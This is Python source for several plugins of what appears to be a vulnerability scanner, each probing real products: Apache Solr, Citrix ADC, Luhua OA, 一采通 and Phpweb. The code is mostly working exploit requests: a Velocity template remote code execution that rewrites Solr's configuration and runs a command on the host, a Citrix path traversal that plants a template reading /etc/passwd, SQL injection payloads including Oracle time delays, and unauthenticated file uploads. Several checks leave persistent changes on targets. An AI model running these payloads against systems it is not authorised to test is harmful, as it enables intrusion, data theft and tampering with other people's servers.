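def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check an Apache Solr instance for the VelocityResponseWriter template RCE.

    Flow: enumerate cores via ``/solr/admin/cores``; POST to one core's
    ``/config`` API to enable the Velocity response writer with the params
    resource loader; then issue a ``select`` whose inline template runs
    ``ping <dnslog host>``.  A DNSlog hit (``DL.result()``) is the only
    confirmation signal -- the HTTP body is kept for the report but does not
    decide the outcome.

    Args:
        Url: target base URL, split by ``UrlProcessing`` into scheme/host/port.
        RandomAgent: User-Agent string to send.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Intrusive side effects on the target (nothing here reverts them):
      * the core's configuration is changed persistently by the ``/config``
        POST (Velocity writer and params resource loader enabled);
      * a ``ping`` child process is spawned on the Solr host.  ``ping`` with
        no count flag does not terminate on most Unix systems, so
        ``$ex.waitFor()`` never returns there and the Solr request thread
        stays busy -- NOTE(review): use a bounded command before running
        this at scale.

    Fixes vs. the previous version: ``verify=False`` was missing on the first
    request only (self-signed HTTPS targets aborted before the check began);
    the report format string had two placeholders for three arguments, so the
    DNSlog hostname was silently dropped; an empty core list no longer sends
    requests to ``/solr//config``.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        step1 = requests.get(base + '/solr/admin/cores', timeout=6,
                             proxies=proxies, headers=headers,
                             verify=False).text
        data = json.loads(step1)
        cores = data.get('status') if isinstance(data, dict) else None
        if not cores:
            return  # not Solr, or nothing to exercise
        # Only the last listed core is exercised (same choice as before).
        name = list(cores)[-1]
        DL = ClassCongregation.Dnslog()
        config_path = "/solr/" + name + "/config"
        select_path = (
            '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom='
            '%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))'
            '+%23set($chr=$x.class.forName(%27java.lang.Character%27))'
            '+%23set($str=$x.class.forName(%27java.lang.String%27))'
            '+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()'
            '+%23set($out=$ex.getInputStream())'
            '+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
        ).format(DL.dns_host())
        # Config API body: enable the Velocity writer with params-driven templates.
        payload_data = json.dumps({
            "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            }
        })
        headers1 = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
        }
        requests.post(base + config_path, data=payload_data, headers=headers1,
                      proxies=proxies, timeout=6, verify=False)
        resp2 = requests.get(base + select_path, headers=headers, timeout=6,
                             proxies=proxies, verify=False)
        con2 = resp2.text
        if DL.result():
            Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n{}\r\nDNSlog:{}\r\n".format(
                url, con2, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result on.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write to file: url is the per-target filename, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + str(_) + " || Target Url:" + str(url), e)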
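def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a Citrix ADC/Gateway for the ``/vpn/../vpns/`` traversal RCE.

    A POST to ``newbm.pl`` (reached through the ``/vpn/../vpns/`` traversal)
    stores a bookmark whose ``desc`` is a Perl Template Toolkit directive that
    runs ``cat /etc/passwd``.  The stored template is then fetched as
    ``/vpns/portal/<random>.xml``; the finding is reported only when the
    first response carries ``parent.window.ns_reload`` and the second looks
    like an ``/etc/passwd`` (``root:``, ``bin:`` and ``/root`` all present).

    Args:
        Url: target base URL, split by ``UrlProcessing``.
        RandomAgent: User-Agent string to send.
        Token: forwarded to ``ClassCongregation.VulnerabilityDetails``.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.

    Side effect on the target: a template ``<random>.xml`` is written under
    the portal templates directory and is not removed afterwards.

    NOTE(review): the ``NSC_USER`` header value is ``"******"`` in this copy
    and looks redacted.  ``str.format`` on a string with no placeholders is a
    no-op, so ``randoms`` is never inserted and the literal asterisks are
    sent; restore the real value before relying on this check.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    payload_url = base + "/vpn/../vpns/portal/scripts/newbm.pl"
    randoms = rand()
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            "Connection": "close",
            "NSC_USER": "******".format(randoms),  # see NOTE(review) above
            "NSC_NONCE": "nsroot",
        }
        data = ("url=http://example.com&title={}&desc=[% template.new('BLOCK' = "
                "'print `cat /etc/passwd`') %]").format(randoms)
        resp = requests.post(payload_url, data=data, headers=headers,
                             proxies=proxies, timeout=5, verify=False,
                             allow_redirects=False)
        if resp.status_code != 200 or "parent.window.ns_reload" not in resp.text:
            return
        payload_url2 = base + '/vpn/../vpns/portal/{}.xml'.format(randoms)
        headers2 = {
            "NSC_USER": "******",
            "NSC_NONCE": "nsroot",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0",
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
        }
        resp2 = requests.get(payload_url2, headers=headers2, proxies=proxies,
                             timeout=5, verify=False)
        con2 = resp2.text
        looks_like_passwd = all(marker in con2 for marker in ("root:", "bin:", "/root"))
        if resp2.status_code == 200 and looks_like_passwd:
            Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
                url, payload_url2, data, con2)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result on.
            ClassCongregation.VulnerabilityDetails(_t.info, url, Token).Write()
            # Write to file: url is the per-target filename, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Log the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, _)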
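def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a 璐华 (Luhua) OA instance for SQL injection and an exposed user page.

    Two independent probes, each with its own error handling so one failing
    does not stop the other:
      1. for every prefix in the module-level ``urls``, request
         ``<prefix><payload>`` (``payload`` is module-level too; neither is
         defined in this function) and flag an HTTP 500 whose body contains
         ``gqxmicrosoft``;
      2. request ``/include/get_user.aspx`` and flag a body containing
         ``button_normal``.  NOTE(review): this is a bare string match on a
         CSS class and the report text carries no vulnerability name; treat
         hits as candidates to confirm manually.

    Args:
        Url: target base URL, split by ``UrlProcessing``.
        RandomAgent: User-Agent string to send.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Fixes vs. the previous version: the first probe built its URL without the
    port, so targets on a non-default port were scanned on 80/443 instead;
    the bare ``except:`` there also swallowed ``KeyboardInterrupt`` and
    ``SystemExit`` and logged nothing about the exception itself.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }

    def _report(Medusa):
        # Write to file: url is the per-target filename, Medusa the result.
        ClassCongregation.WriteFile().result(str(url), str(Medusa))
        _t = VulnerabilityInfo(Medusa)
        # Pass the url and the scan result on.
        ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()

    def _log_error(e):
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + str(_) + " || Target Url:" + str(url), e)

    # Probe 1: error-based SQL injection across the known endpoints.
    for turl in urls:
        try:
            payload_url = base + turl + payload
            resp = requests.get(payload_url, headers=headers, proxies=proxies,
                                timeout=5, verify=False)
            if resp.status_code == 500 and 'gqxmicrosoft' in resp.text.lower():
                _report("{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url))
        except Exception as e:
            _log_error(e)

    # Probe 2: unauthenticated user listing page.
    try:
        payload_url = base + "/include/get_user.aspx"
        resp = requests.get(payload_url, headers=headers, proxies=proxies,
                            timeout=5, verify=False)
        if 'button_normal' in resp.text.lower():
            _report("{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url))
    except Exception as e:
        _log_error(e)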
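def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check 一采通 e-procurement for arbitrary file upload via ``img_save.asp``.

    Uploads a ``.cer`` file whose body is a random marker through the editor's
    image-save endpoint, extracts the stored filename from the
    ``getimg('<n>.cer')`` snippet in the response, fetches it back from
    ``/library/editornew/Editor/NewImage/`` and reports when the marker is
    served with HTTP 200.

    Args:
        Url: target base URL, split by ``UrlProcessing``.
        Headers: base request headers; copied, never mutated (the previous
            version wrote ``Content-Type``/``Accept`` into the caller's dict,
            leaking them into every other plugin sharing it).
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Side effect on the target: the uploaded ``.cer`` file stays on disk.  The
    body is a harmless marker; it is deliberately not a webshell.

    Fixes vs. the previous version: the multipart body was sent with
    ``Content-Type: application/x-www-form-urlencoded`` and no boundary
    (the sibling Phpweb plugin sends the correct multipart header); the body
    contained non-Latin-1 text (``提交``) as ``str``, which http.client
    cannot encode and raised before any request was sent -- it is now sent as
    UTF-8 bytes with CRLF line ends; the marker was compared against a
    lower-cased body without lower-casing the marker, so a marker containing
    upper-case letters never matched.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    try:
        RD = ClassCongregation.randoms().result(20)
        payload_url = base + "/library/editornew/Editor/img_save.asp"
        boundary = "----WebKitFormBoundaryNjZKAB66SVyL1INA"
        # (field name, value, (filename, content-type) or None)
        fields = [
            ("img_src", RD, ("123.cer", "application/x-x509-ca-cert")),
            ("Submit", "提交", None),
            ("img_alt", "", None),
            ("img_align", "baseline", None),
            ("img_border", "", None),
            ("newid", "45", None),
            ("img_hspace", "", None),
            ("img_vspace", "", None),
        ]
        lines = []
        for field, value, file_info in fields:
            lines.append("--" + boundary)
            if file_info is None:
                lines.append('Content-Disposition: form-data; name="{}"'.format(field))
            else:
                lines.append('Content-Disposition: form-data; name="{}"; filename="{}"'.format(
                    field, file_info[0]))
                lines.append("Content-Type: " + file_info[1])
            lines.append("")
            lines.append(value)
        lines.append("--" + boundary + "--")
        lines.append("")
        data = "\r\n".join(lines).encode("utf-8")
        hdrs = dict(Headers)
        hdrs['Content-Type'] = 'multipart/form-data; boundary=' + boundary
        hdrs['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        resp = requests.post(payload_url, data=data, headers=hdrs,
                             proxies=proxies, timeout=6, verify=False)
        match = re.search(r"getimg\('(\d+\.cer)'\)", resp.text)
        if not match:
            return
        payload_url2 = base + "/library/editornew/Editor/NewImage/" + match.group(1)
        resp2 = requests.get(payload_url2, headers=hdrs, timeout=6,
                             proxies=proxies, verify=False)
        con2 = resp2.text
        if resp2.status_code == 200 and RD.lower() in con2.lower():
            Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                url, payload_url2, con2)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result on.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write to file: url is the per-target filename, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + str(_) + " || Target Url:" + str(url), e)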
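def medusa(Url, RandomAgent, UnixTimestamp):
    """Time-based (Oracle) SQL injection check for 一采通 e-procurement.

    Each candidate endpoint is requested twice with an appended
    ``AND 6371=DBMS_PIPE.RECEIVE_MESSAGE(11,N)`` clause: once with N=0 (no
    delay, the baseline) and once with N=5.  The parameter is reported as
    injectable when the delayed request takes more than 4 s longer than the
    baseline.

    Args:
        Url: target base URL, split by ``UrlProcessing``.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Fixes vs. the previous version: the comparison was inverted
    (``baseline - delayed > 4``), so a real 5 s delay was never reported and
    a slow baseline produced false positives; the delayed request used the
    same 6 s timeout as the baseline, so any target with >1 s of round-trip
    time timed out on a true positive and the hit was lost as an error;
    ``code != 0`` guards were always true and are gone; the session is now
    closed.

    NOTE(review): a single measurement pair is noisy on loaded or distant
    targets -- repeating the pair before reporting would cut false positives.
    This plugin sends no proxies, unlike its siblings.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    urls = [
        '/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1',
        '/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1',
        '/Price/SuggestList.aspx?priceid=1',
        '/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1',
        '/Products/Category/CategoryOption.aspx?option=IsStop&classId=1',
        '/Products/Tiens/CategoryStockView.aspx?id=1',
        '/custom/CompanyCGList.aspx?ComId=1',
        '/SuperMarket/InterestInfoDetail.aspx?ItemId=1',
        '/Orders/k3orderdetail.aspx?FINTERID=1',
        '/custom/GroupNewsList.aspx?child=true&groupId=121',
    ]
    no_delay = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)"
    delay_5s = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)"
    delay_seconds = 5
    threshold = 4
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    for path in urls:
        try:
            baseline_url = base + path + no_delay
            delayed_url = base + path + delay_5s
            with requests.session() as s:
                t0 = time.monotonic()
                resp = s.get(baseline_url, headers=headers, timeout=6, verify=False)
                t1 = time.monotonic()
                # Allow the injected sleep plus the same headroom as the baseline.
                s.get(delayed_url, headers=headers, timeout=6 + delay_seconds, verify=False)
                t2 = time.monotonic()
            baseline = t1 - t0
            delayed = t2 - t1
            if delayed - baseline > threshold:
                Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(
                    url, resp.text, baseline_url)
                _t = VulnerabilityInfo(Medusa)
                # Pass the url and the scan result on.
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
                # Write to file: url is the per-target filename, Medusa the result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            # Log the URL and the failing plugin name.
            ClassCongregation.ErrorLog().Write(url, _)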
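def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check Phpweb for the unauthenticated file upload via ``base/appfile.php``.

    Flow: POST ``act=appcode`` to ``/base/post.php`` and pull the ``k=`` token
    out of the response; derive ``m = md5(k + "1")``; upload a ``.txt`` whose
    body is a random marker through ``/base/appfile.php``; then fetch
    ``/effect/source/bg/<marker>.txt`` and report when it returns HTTP 200
    with the marker inside.

    Args:
        Url: target base URL, split by ``UrlProcessing``.
        RandomAgent: User-Agent string to send.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Side effect on the target: the uploaded ``.txt`` stays on disk.  The
    body is a harmless marker (the form field literally says ``getshell``,
    but no code is uploaded).

    Fix vs. the previous version: a response without a leading ``k=...&``
    made ``re.match(...).group(1)`` raise ``AttributeError`` on ``None``,
    which was logged as a plugin error; a missing token now ends the check
    quietly and the token is located anywhere in the body.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Scheme default only; an unknown scheme keeps port=None as before.
        port = {'https': 443, 'http': 80}.get(scheme)
    base = "{}://{}:{}".format(scheme, url, port)
    try:
        token_url = base + "/base/post.php"
        upload_url = base + "/base/appfile.php"
        ran = ranstr(10)
        check_url = base + "/effect/source/bg/{}.txt".format(ran)
        boundary = "----WebKitFormBoundary0ZoOKoVwkSlGFfVE"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        headers2 = dict(headers)
        headers2['Content-Type'] = 'multipart/form-data; boundary=' + boundary
        resp = requests.post(token_url, data="act=appcode", proxies=proxies,
                             headers=headers, timeout=5, verify=False)
        token = re.search(r'k=(.*?)&', resp.text, re.M | re.I)
        if token is None:
            return  # no upload token -> not Phpweb, or a patched version
        k = token.group(1)
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        # (field name, value, filename or None)
        fields = [
            ("file", ran, ran + ".txt"),
            ("t", "1", None),
            ("m", md5_en, None),
            ("act", "upload", None),
            ("r_size", "10", None),
            ("submit", "getshell", None),
        ]
        lines = []
        for field, value, filename in fields:
            lines.append("--" + boundary)
            if filename is None:
                lines.append('Content-Disposition: form-data; name="{}"'.format(field))
            else:
                lines.append('Content-Disposition: form-data; name="{}"; filename="{}"'.format(
                    field, filename))
                lines.append("Content-Type: application/octet-stream")
            lines.append("")
            lines.append(value)
        lines.append("--" + boundary + "--")
        upload_body = "\r\n".join(lines)
        requests.post(upload_url, data=upload_body, proxies=proxies,
                      headers=headers2, timeout=5, verify=False)
        resp3 = requests.get(check_url, headers=headers, proxies=proxies,
                             timeout=5, verify=False)
        con3 = resp3.text
        if resp3.status_code == 200 and ran in con3:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, upload_url, upload_body, check_url, con3)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result on.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write to file: url is the per-target filename, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + str(_) + " || Target Url:" + str(url), e)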
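def medusa(**kwargs) -> None:
    """Check an Apache Solr instance for the VelocityResponseWriter template RCE.

    Keyword-argument variant of the Solr plugin.  Flow: enumerate cores via
    ``/solr/admin/cores``; POST to one core's ``/config`` API to enable the
    Velocity response writer with the params resource loader; then issue a
    ``select`` whose inline template runs ``ping <dnslog host>``.  A DNSlog
    hit (``DL.result()``) is the only confirmation signal.

    Keyword Args:
        Url: target base URL (used as-is; a trailing ``/`` is stripped).
        Headers: base request headers; copied, never mutated.
        Proxies: proxy mapping passed straight to ``requests``.
        All kwargs are forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Intrusive side effects on the target (nothing here reverts them): the
    core's configuration is changed persistently by the ``/config`` POST; a
    ``ping`` child process is spawned on the Solr host and, with no count
    flag, does not terminate on most Unix systems -- NOTE(review): use a
    bounded command before running this at scale.

    Fixes vs. the previous version: ``Headers1`` and ``Headers2`` were both
    the caller's dict, so the JSON ``Content-Type`` overwrote the form one
    and leaked into every plugin sharing the dict; ``VulnerabilityDetails``
    was given the ``Response`` object instead of the url; the report format
    string had two placeholders for three arguments and dropped the DNSlog
    host; ``verify=False`` was missing on the first request; an empty core
    list no longer sends requests to ``/solr//config``.

    Exceptions are logged through ``ErrorHandling``/``ErrorLog``; never raises.
    """
    url = kwargs.get("Url")          # target url
    Headers = kwargs.get("Headers")  # base headers
    proxies = kwargs.get("Proxies")  # proxy mapping
    try:
        base = str(url).rstrip('/')
        form_headers = dict(Headers or {})
        form_headers['Content-Type'] = 'application/x-www-form-urlencoded'
        json_headers = dict(Headers or {})
        json_headers['Content-Type'] = 'application/json'
        step1 = requests.get(base + '/solr/admin/cores', timeout=6,
                             proxies=proxies, headers=form_headers,
                             verify=False).text
        data = json.loads(step1)
        cores = data.get('status') if isinstance(data, dict) else None
        if not cores:
            return  # not Solr, or nothing to exercise
        # Only the last listed core is exercised (same choice as before).
        name = list(cores)[-1]
        DL = ClassCongregation.Dnslog()
        config_path = "/solr/" + name + "/config"
        select_path = (
            '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom='
            '%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))'
            '+%23set($chr=$x.class.forName(%27java.lang.Character%27))'
            '+%23set($str=$x.class.forName(%27java.lang.String%27))'
            '+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()'
            '+%23set($out=$ex.getInputStream())'
            '+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
        ).format(DL.dns_host())
        # Config API body: enable the Velocity writer with params-driven templates.
        payload_data = json.dumps({
            "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            }
        })
        requests.post(base + config_path, data=payload_data, headers=json_headers,
                      proxies=proxies, timeout=6, verify=False)
        resp2 = requests.get(base + select_path, headers=form_headers, timeout=6,
                             proxies=proxies, verify=False)
        con2 = resp2.text
        if DL.result():
            Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n{}\r\nDNSlog:{}\r\n".format(
                url, con2, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result on.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write to file: url is the per-target filename, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + str(_) + " || Target Url:" + str(url), e)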